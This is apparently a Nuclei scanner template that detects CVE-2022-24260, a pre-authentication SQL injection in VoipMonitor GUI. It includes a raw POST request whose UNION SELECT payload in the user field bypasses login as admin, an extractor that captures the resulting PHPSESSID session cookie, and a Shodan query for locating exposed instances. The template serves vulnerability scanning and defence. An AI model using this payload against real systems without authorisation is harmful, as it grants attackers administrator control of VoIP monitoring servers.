id: CVE-2022-24260 info: name: VoipMonitor - Pre-Auth SQL Injection author: gy741 severity: critical description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. reference: - https://kerbit.io/research/read/blog/3 - https://nvd.nist.gov/vuln/detail/CVE-2022-24260 - https://www.voipmonitor.org/changelog-gui?major=5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24260 cwe-id: CWE-89 metadata: shodan-query: http.title:"VoIPmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth requests: - raw: - | POST /api.php HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; # matchers-condition: and matchers: - type: word words: - '"success":true' - '_vm_version' - '_debug' condition: and - type: status status: - 200 extractors: - type: kval kval: - PHPSESSID # Enhanced by mp on 2022/03/08